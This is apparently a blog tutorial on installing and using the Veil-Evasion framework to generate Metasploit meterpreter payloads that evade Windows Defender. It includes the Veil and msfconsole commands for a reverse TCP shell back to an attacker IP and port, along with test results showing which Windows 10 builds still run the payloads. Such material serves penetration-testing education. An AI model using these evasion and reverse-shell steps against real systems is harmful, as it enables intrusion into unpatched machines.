Running your awesome payload and getting it shot down by antivirus software is kind of the same as having your Lamborghini’s launch control active and seeing a Police car parking in front of you. It kind of spoils the concept. The Veil-Evasion framework is a great way to get rid of that digital police car and have your payloads evade detection by antivirus software. In this blog post, I give you some examples of how to use Veil and obfuscate the true intentions of your payloads.
Veil-Evasion is free to use and can be downloaded from GitHub. It is designed to generate Metasploit payloads that bypass common antivirus solutions. It is not a complex tool to use and that makes it very powerful. Windows Defender is one of those solutions which is present on Windows clients and server by default, and where some bypassing techniques really come in handy. Since it is installed by default you have to keep in mind that it will easilly block commonly used payloads which do not use obfuscation techniques.
Veil-Evasion framework installation on Kali Linux
For this blog post, I will install Veil-Evasion on my newly deployed Kali Linux VM. Keep in mind that you install the new Veil 3, not the older one based on Python 2.7, since that version is end of life.
apt-get install veil -y
With the framework downloaded via apt, I can now start installing Veil and the necessary components. The install script is launched automatically when you start Veil. After that, you only have to proceed by choosing ‘y’
After installing Wine and some other components, the installer will prompt you to install Python. Just use the default settings (next->next->finish) for this and let it run. The same will occur for PyWin and PyCrypto.
If there are any errors during your installing you can always rerun the installation script manually. This fixed some configuration issues with Wine for me. If all went well, you can skip the command below.
/usr/share/veil/config/setup.sh --force --silent
When the installation of Veil is finished you can start it by typing ‘veil’.
Make sure that you run the update command frequently to make sure your copy of Veil is running with the latest updates. Now it’s time to see what Veil has to offer out of the box.
With the list command you can see which tools are available to use. In my case, it’s just installed and I have two options: Evasion and Ordnance.
- Evasion: create payloads that evade detection by antivirus software
- Ordnance: generate shellcode for supported payloads.
Since the blog post focusses on using evasion techniques based on Veil, I will use the first module. The command use can be used to select which tool you want, followed by the ID or name of the tool.
Selecting Evasion as my tool shows a new submenu from which I can proceed to list the loaded payloads. As you can see on the screenshot below there are 41 payloads loaded.
The list command shows the available payloads to choose from. There are a few payloads per programming language to fit your needs.
Let’s take an easy example for a Microsoft Windows 10 client and use: powershell/meterpreter/rev_tcp.py You can use a payload with the use command followed by the ID of the payload. by simply running the following command:
Now that the payload I want to use is selected, it’s time to set the parameters and make sure it knows where to connect to. So I configure the LHOST and LPORT with the IP of my Attacker machine and the port I will use for the Metasploit listener. Since we are playing hacker today, let’s use 1337 for the LPORT and my current IP-address for the LHOST. This is done using the set command.
set lport 1337
set lhost 192.168.1.4
Now that all parameters are set, it’s only a matter of invoking the generate command to create the payload. Since Powershell does not need to compile I can grab the code directly in /var/lib/veil/output/source/. Other languages will compile first.
Running the payload and getting the reverse shell
Before running the payload I have to make sure that there is a Metasploit listener ready to receive the incoming connection. To set up a listener I first start Metasploit and after that configure the Multi Handler exploit.
set payload windows/meterpreter/reverse_tcp
set LPORT 1337
set LHOST 192.168.1.4
If all work well, the reverse shell is initiated upon the start of the payload. You will see an incoming connection in Metasploit like in the example below and you have a working meterpreter shell which gives you all kind of nice privileges.
Is Veil-Evasion still valuable in today’s world?
Microsoft has really upped their game with Windows Defender to block the meterpreter payload. I have had some different results with different versions of Windows. For example, Windows 10 build 1909 with Defender enabled blocked all the different payloads I used. I tried the C, C#, Go, Perl, Python, and Powershell. All got blocked trying to download or run them.
So let’s try another build of Windows 10 since not everyone is always on the latest builds. I checked to see how Build 1703 is working out and it was much better. Windows Defender was running, but the machine was nog updated beyond 1703. Only the C# payloads where blocked, but the Go and Ruby payloads worked like a charm. You do get a SmartScreen warning, but it does execute the meterpreter and setup the reverse TCP connection back to my attacker machine.
Does Veil-Evasion have some value as of today? Yes, I believe it has. Since there is a lot of machines running Windows 10 which are not updated to the latest build, you can still use Veil tot hide your intentions. For example, Build 1607 has been end of life for a while, but you can still find them exposed to the internet. And don’t get me started about Windows 7 🙂